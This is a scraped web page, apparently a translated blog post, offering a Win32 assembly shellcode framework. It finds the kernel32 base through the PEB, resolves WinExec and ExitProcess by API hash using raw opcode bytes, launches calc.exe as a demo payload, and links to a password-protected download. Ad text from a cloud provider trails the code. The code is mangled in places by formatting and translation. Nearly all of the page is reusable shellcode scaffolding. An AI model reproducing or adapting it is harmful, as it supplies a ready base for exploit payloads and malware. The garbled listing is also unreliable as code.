Main methods:
All the tricks of using a macro to get the compiler to figure out the length of the code
Have better extensibility
Include shellcodecalc.inc;>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>; Code Snippet;>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>.code;>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>; API Hash Value;>>>>>>>>>>>>>>>>>>>>>>>>> >>>&gT;>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>; MessageBoxA 1e380a6ah; LoadLibraryA 0c917432h; ExitProcess 4fd18963h; WinExec 1a22f51h;>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>; ShellCode Model Introduction;>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>; ........................................................; decoding shellcode length unknown; ShellCode-----------------------------...; ...; ...;.........; GetkerThe length of the nelbase is known; ...; ...; ...; ...; ...; ...;; ...;; ...;; ...;; ...;.............; The length of the getporcaddress is known; ...; ...; ...; ...; ...; ...;; ...;; ...;; ...;; ...;.............; The String length is unknown; ... and ...; ...; ...; ...;; ...;; ...;; ...;; ...;; ...;; ...;...........; Shellcode that can grow longer; Raise the top of the stack to get the function pointer; Complete the Shellcode function, ..... ...; ...; ...; ...;; ...;; ...;..; ......................; >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>; SHELLCODE macro Definition Section;>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>decode_len equ Decodeend-decodebegin ; The length of the decrypted code Encode_LEN equ shellcodeend-mygetkernelbegin; length of the cryptographic code Kernel_base_len equ Mygetkernelend-mygetkernelbegin ; Mygetkernelbase code length Procaddr_len equ mygetprocaddressend-mygetprocaddressbegin; GetProcAddress code length Shellcode_len equ shellcodeend-shellcodebegin; Shellcode code length String_len equ string_end-string_begin; string length dwgetkernelbase = decode_len-5 ; Getkernelbase offsetdwgetprocaddress = Decode_len + kernel_base_len-5; GetProcAddress offsetstack_len equ 100; Raise the size of the top of the stack dwkernelbase = 0h; Kernelbase offset fnwinexec = 4h; fnwinexec offset hUser32 = 8h; HUser32 offset Fnmessagebox = 0Ch; MessageBox offset fnexitprocess = 10h; ExitProcess offset;>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; Decoding part;>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>decodebegin: Reposition call get_eip_1 get_eip_1:pop ebx; Decrypt code [cannot use EBX Register]; Jump to shellcode start jmp shellcodebegindecodeend:;>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>; Mygetkernelbase;>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>mygetkernelbegin:g_fn_getkernelbase DB 064h,0a1h,18h,00H,00h,00h,8bh,40h,30h,8bh,40h,0ch,8bh,40h,0ch,8bh,00h,8bh,00h,8bh,40h,18h,0c3hmygetkernelend:;>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>; Mygetprocaddress;>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>mygetprocaddressbegin:g_fn_getprocaddress DB 55h,8bh,0ech,56h,53h,51h,83h,7dh,08h,00h, 74H,6BH,8BH,75H DB 08h,03h,76h,3ch,8dh,76h,78h,8bh,36h,03h,75h,08h,8bh,5eh db 20 H,03H,5DH,08H,33H,0C9H,8BH,04H,8BH,03H,45H,08H,51H,8BH DB 0d0h,33h,0c0h,8ah,0ah,84h,0c9h,74h,11h,0fh, 0BEH,0C9H,0C1H DB 0c8h,07h,83h,0c2h,01h,03h,0c1h,8ah,0ah,84h,0c9h,75H,0EFH DB 59h,3bh,45h,0ch,74h,06h,41h,3bh,4eh,18h,72h,0d2h,3bh,4eh,18h db 73h, 22H,8BH,5EH,24H,03H,5DH,08H,0FH,0B7H,04H,4BH,3BH,46H DB 14h,73h,13h,8bh,5eh,1ch,03h,5dh,08h,8bh,04h,8 3h,03h,45h DB 08h,59h,5bh,5eh,0c9h,0c2h,08h,00h,33h,0c0h,59h,5bh,5eh db 0c9h,0c2 H,08h,00hmygetprocaddressend:;>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>; String;>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>string_begin:lpcmd db ' Calc.exe ', 0cmd_len = String_end-lpcmdlpszcmd = dwgetprocaddress + PROCADDR _len; LPsZuser32string_end:;>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>; ShellCode;>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>shellcodebegin:; expansion stack space Save stack environment sub Esp,stack_len push EBP mov ebp,esp; get Kernel32.dll base site Lea EAX, [ebx + dwgetkernelbase] call eax or eax,eax JZ Exit_shellcode mov dword ptr [Ebp + dwkernelbase],eax; Traverse export Table Get Winex EC address Push 1a22f51h push DWORD ptr [EBP + dwkernelbase] Lea EAX,[EBX + dwgetprocaddress] call eax or Eax,eax JZ Exit_shellcode mov dword ptr [EBP + fnwinexec],eax; Eject calculator push sw_shownormal Lea EAX,[EBX + lpszcmd] push eax cal l DWORD ptr [Ebp + fnwinexec] Exit_shellcode: Get ExitProcess function address push 4fd18963h push DWORD ptr [EBP + dwkernelbase] Lea EAX,[EBX + dwgetprocaddr ESS] call eax or eax,eax JZ shellcodeend mov dword ptr [EBP + fnexitprocess],eax; invoke ExitProcess push NULL cal l DWORD ptr [Ebp + fnexitprocess]shellcodeend:nopnopnopnop;>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>; End;>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>> >>>showlen proc; test length invoke Crt_printf,l ("Decode Len:", 9h, "%d", 0AH,0DH), Decode_len invoke Crt_printf,l ("E Ncode len: ", 9h,"%d ", 0AH,0DH), Encode_len invoke Crt_printf,l (" Getkernelbase Len: ", 9h,"%d ", 0AH,0DH), Kernel_basE_len invoke Crt_printf,l ("GetProcAddress len:", 9h, "%d", 0AH,0DH), Procaddr_len invoke Crt_printf,l ("ShellCode len:", 9h, "%d", 0AH,0DH), Shellcode_len retshowlen endpmain proc; invoke Showlen jmp decodebeginmain endpend Main
Code:
Link: Http://pan.baidu.com/s/1bnGlW1T Password: o9m7
Shellcode Framework (written by Win32asm)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
